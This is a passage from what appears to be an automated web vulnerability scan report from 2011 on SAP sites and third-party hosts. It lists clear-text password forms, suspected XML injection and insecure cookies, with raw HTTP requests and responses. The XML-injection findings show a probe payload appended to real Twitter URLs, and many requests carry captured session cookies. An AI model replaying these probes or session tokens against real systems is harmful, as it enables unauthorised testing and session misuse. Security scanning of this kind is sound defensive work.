s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318691703148%3B%20pe%3Dno%2520value%7C1318691703151%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318691703155%3B%20s_nr%3D1318689903165-New%7C1321281903165%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293503170%3B%20s_visit%3D1%7C1318691703171%3B%20gpv_p47%3Dno%2520value%7C1318691703175%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3Dsapcommunity%252Csapglobal%253D%252526pid%25253Dscn%2525253Aglo%2525253Ablog%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.sdn.sap.com/irj/scn/sdnweblogs/popularposts%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Content-Length: 28644
Date: Sat, 15 Oct 2011 14:58:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...

6.10. http://www.sdn.sap.com/irj/scn/weblogs  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/weblogs

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/scn/weblogs?blog=/weblogs/topic/27 HTTP/1.1
Host: www.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitID=QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; saplb_*=(J2EE3414700)3414750; Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; JSESSIONID=(J2EE3414700)ID1654067250DB01193030658320856037End; SDNSTATE=392433836.14340.0000; PortalAlias=scn; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20c13%3Dscn%253Aglo%253Aforums%7C1318690486859%3B%20pe%3Dno%2520value%7C1318690486862%3B%20c3%3Dno%2520value%7C1318690486864%3B%20s_nr%3D1318688686869-New%7C1321280686869%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292286872%3B%20s_visit%3D1%7C1318690486873%3B%20gpv_p47%3Dno%2520value%7C1318690486876%3B%20s_ttc%3D1318688493%7C1350224686878%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGN0Q2QjQtQzUxNjc5ODlDNjZFMjk0Mw==
Expires: 0
Content-Length: 28880
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:24:59 GMT
Connection: close
Set-Cookie: PortalAlias=scn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...

6.11. http://www.sdn.sap.com/irj/sdn/logon  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/logon

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/sdn/logon HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:04:54 GMT
Content-Length: 21956
Connection: close
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...

6.12. http://www.sdn.sap.com/irj/sdn/mypoints  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/sdn/mypoints

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /irj/sdn/mypoints HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
Expires: 0
Date: Sat, 15 Oct 2011 15:05:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=sdn; Path=/
Set-Cookie: PortalAlias=sdn; Path=/
Content-Length: 44998

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div class="boxtop">
           <form name="loginform" method="post" id="loginform" accept-charset="ISO-8859-1">
    <input type="hidden" name="login_submit" value="on">
...[SNIP]...
<td><input class="textinput" name="j_password" type="password" maxlength="50" onkeypress="checkEnter(event)"></td>
...[SNIP]...

7. XML injection  previous  next
There are 3 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


7.1. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/t.gif?_=1318688595613&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&text=%23SAPPHIRENOW&url=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&via=sapphirenow&twttr_referrer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; __utma=43838368.1721518288.1314976448.1317669673.1317824994.9; __utmz=43838368.1317824994.9.8.utmcsr=swampland.time.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/08/25/health-care-problem-creeping-up-on-romney-again/; k=10.35.1.123.1318434060898796

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>CD3BEF8875A7FBAF</RequestId><HostId>qEf2Fm9uzfxq0yMoB0JOd3exHjnUQvBh2t7vXFSc6DzhxLQ5+Q
...[SNIP]...

7.2. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/t.gif?_=1318688595613&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&text=%23SAPPHIRENOW&url=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&via=sapphirenow&twttr_referrer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; __utma=43838368.1721518288.1314976448.1317669673.1317824994.9; __utmz=43838368.1317824994.9.8.utmcsr=swampland.time.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/08/25/health-care-problem-creeping-up-on-romney-again/; k=10.35.1.123.1318434060898796

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>659DADBABD2EF17C</RequestId><HostId>WssntmQmtd5riloZQlQOafp/ytwEYbOg8TbElEMmhlZPO76bvN
...[SNIP]...

7.3. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/t.gif]]>>?_=1318688595613&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&text=%23SAPPHIRENOW&url=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&via=sapphirenow&twttr_referrer=http%3A%2F%2Fwww.sapphirenow.com%2Fmadrid%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __qca=P0-1403506059-1316475190092; __utma=43838368.1721518288.1314976448.1317669673.1317824994.9; __utmz=43838368.1317824994.9.8.utmcsr=swampland.time.com|utmccn=(referral)|utmcmd=referral|utmcct=/2011/08/25/health-care-problem-creeping-up-on-romney-again/; k=10.35.1.123.1318434060898796

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sat, 15 Oct 2011 14:23:01 GMT
Connection: close
Connection: Transfer-Encoding
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>484825C65BB451D4</RequestId><HostId>4lhCNp4PSZLYDp7lRN1HPUZwkhZhMCGeVodcoPEv5nX3ApZmBj
...[SNIP]...

8. SSL cookie without secure flag set  previous  next
There are 22 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://s.analytics.yahoo.com/fpc.pl  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://s.analytics.yahoo.com
Path:   /fpc.pl

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fpc.pl?a=10002109824374&v=4.47&enc=utf-8&f=https%3A//www.sap.com/sme/contactsap/index.epx&b=Contact%20SAP&c=sme&x=07&cf3=Contact_General&cf4=Contact_General&cf17=Global&e=http%3A//burp/show/12&flv=WIN%2010%2C3%2C183%2C10&d=Sat%2C%2015%20Oct%202011%2015%3A15%3A41%20UTC&n=5&g=en-us&h=Y&j=1920x1200&k=16&l=true&ittidx=0&fpc=M7bgHDDi%7CKd30fNBLaa%7Cfses10002109824374%3D%7CKd30fNBLaa%7CM7bgHDDi%7Cfvis10002109824374%3DZj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA%3D%3D%7C8M8o0780sT%7C8M8o0780sT%7C8M8o0780sT%7C8%7C8M8o0780sT%7C8M8o0780sT HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: s.analytics.yahoo.com
Connection: Keep-Alive
Cookie: B=bbb07qp77cca3&b=3&s=p1; itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|M|8M8o0780Hs|T; itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:15:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: itvisitorid10002109824374=Kd30fNBLaa|M7bgHDDi|fvis10002109824374=Zj1odHRwcyUzQS8vd3d3LnNhcC5jb20vc21lL2NvbnRhY3RzYXAvaW5kZXguZXB4JmI9Q29udGFjdCUyMFNBUA==|T|T|T|T|8M8o078HsM|T; path=/; domain=.analytics.yahoo.com
Set-Cookie: itsessionid10002109824374=Kd30fNBLaa|fses10002109824374=; path=/; domain=.analytics.yahoo.com
TS: 0 205 dc4_ird
Pragma: no-cache
Expires: Sat, 15 Oct 2011 15:15:24 GMT
Cache-Control: no-cache, private, must-revalidate
Content-Length: 45
Accept-Ranges: bytes
Tracking-Status: fpc site tracked
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-javascript

// First Party Cookies
// TS: 0 205 dc4_ird


8.2. https://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Referer: https://www.sap.com/sme/contactsap/index.epx
Host: sales.liveperson.net
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDASQTAASD=EFCBMEDCJGOGKJJDOJPEIKJJ; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...

8.3. https://sales.liveperson.net/visitor/addons/deploy2.asp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sales.liveperson.net
Path:   /visitor/addons/deploy2.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy2.asp?site=37021986&d_id=1&default=simpleDeploy HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
If-Modified-Since: Tue, 11 Oct 2011 14:31:36 GMT
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL; LivePersonID=LP i=5140389589811,d=1318691628

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 11 Oct 2011 14:31:36 GMT
Content-Length: 46014
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQQSRQRS=KCFLHIDCADKIDENMHBAIHMGO; path=/
Cache-control: public, max-age=3600, s-maxage=3600

lpAddMonitorTag();
if(typeof lpMTagConfig!="undefined")lpMTagConfig.getLPVarValue=function(c){if(!lpMTagConfig.varLookup){lpMTagConfig.varLookup={};for(var b=0;b<lpMTagConfig.vars.length;b++){var a=l
...[SNIP]...

8.4. https://sapphire-nowmadrid.sapevents.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sapphire-nowmadrid.sapevents.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sapphire-nowmadrid.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961013;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
Set-Cookie: CFTOKEN=cb2412da3e988c3-0801EEF5-0494-7B81-1E70242D17ED02CD;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:35:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...

8.5. https://wiki.sdn.sap.com/wiki/display/HOME  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://wiki.sdn.sap.com
Path:   /wiki/display/HOME

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wiki/display/HOME HTTP/1.1
Host: wiki.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: SAP NetWeaver Application Server 7.20 / AS Java 7.20
sdn_uid: Guest
sdn_guid: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
sdn_visit: QUMxMDU0MDgtMTMzMDgxNzBFNTktQUNBQzA5QTU4MkExRkM0NA==
Content-Type: text/html;charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-confluence-request-time: 1318690688602
x-confluence-cluster-node: Member(Id=1, Timestamp=2011-10-09 03:06:04.333, Address=172.16.84.8:8088, MachineId=59400, Location=process:23847@spwdfvml0204)
Location: https://wiki.sdn.sap.com:443/wiki/display/HOME/FAQ
Content-Length: 1751
Vary: Accept-Encoding
Date: Sat, 15 Oct 2011 14:58:08 GMT
Connection: close
Set-Cookie: saplb_*=(J2EE8243320)8243350; Version=1; Path=/
Set-Cookie: JSESSIONID=8zWp1LE9zVQKhsRFGYO-DyFbDhcIMwGWyH0A_SAPgKRDRzD6Pucfy_Alqw7AWMYs; Version=1; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>302 Found</title>
<style>
td {font-family : Arial, Tahoma, Helvetica, sans-serif; font-size : 14px;}

...[SNIP]...

8.6. https://sales.liveperson.net/hc/37021986/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/37021986/?&site=37021986&cmd=mTagKnockPage&lpCallId=953043236838-236721785208&protV=20&lpjson=1&id=2404879032&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C%23voice-sales-sap-sme-us-en-1%7ClpMTagConfig.db1%7ClpVoiceButtonDiv1%7C HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: sales.liveperson.net
Connection: Keep-Alive
Cookie: ASPSESSIONIDAQTARCRC=MIIACKDCJHLJIMCHEDDAEOPL

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:27:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986
Set-Cookie: HumanClickKEY=6638045003516868152; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 15:27:11 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Content-Length: 33211

lpConnLib.Process({"ResultSet": {"lpCallId":"953043236838-236721785208","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

8.7. https://store.sap.com/sap/ap/ui/repository/store/StartPage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.sap.com
Path:   /sap/ap/ui/repository/store/StartPage.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sap/ap/ui/repository/store/StartPage.html HTTP/1.1
Host: store.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
